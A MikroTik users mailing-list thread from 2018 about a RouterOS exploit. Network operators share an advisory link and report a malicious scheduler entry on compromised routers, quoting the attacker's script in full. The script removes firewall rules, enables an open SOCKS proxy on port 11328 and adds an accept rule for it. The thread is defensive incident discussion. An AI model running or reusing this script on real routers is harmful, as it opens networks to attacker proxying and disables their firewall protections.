You should subscribe to our newsletters as we mentioned this several weeks ago.... This is the exploit that was fixed back 4 months ago! Lol
Dennis Burgess, Mikrotik Certified Trainer Author of "Learn RouterOS- Second Edition" Link Technologies, Inc -- Mikrotik & WISP Support Services Office: 314-735-0270 Website: http://www.linktechs.net<http://www.linktechs.net/> Create Wireless Coverage's with www.towercoverage.com From: [email protected] <[email protected]> On Behalf Of Bruce Bridegwater via Mikrotik-users Sent: Sunday, August 5, 2018 8:16 PM To: 'Shawn C. Peppers' <[email protected]>; 'Mikrotik Users' <[email protected]>; Bob Pensworth <[email protected]> Cc: JP Douros <[email protected]> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to our attention and providing the solution. RPM manages our Cisco UBR10k CMTS. Great support company. ________________________________ From: [email protected]<mailto:[email protected]> <[email protected]<mailto:[email protected]>> on behalf of Bob Pensworth via Mikrotik-users <[email protected]<mailto:[email protected]>> Sent: Sunday, August 5, 2018 7:57:53 PM To: 'Shawn C. Peppers'; 'Mikrotik Users' Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 We are finding an IP/Socks connection: We are finding an event entry in System/Scheduler And the (below) script in System/Script: /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1; -- Bob Pensworth, WA7BOB | General Manager CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-0000, x1 From: [email protected]<mailto:[email protected]> <[email protected]<mailto:[email protected]>> On Behalf Of Shawn C. Peppers via Mikrotik-users Sent: Friday, March 16, 2018 11:54 AM To: [email protected]<mailto:[email protected]>; [email protected]<mailto:[email protected]> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 I have not tested this yet but.... https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow :: // Shawn Peppers :: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>
_______________________________________________ Mikrotik-users mailing list [email protected] http://lists.wispa.org/mailman/listinfo/mikrotik-users
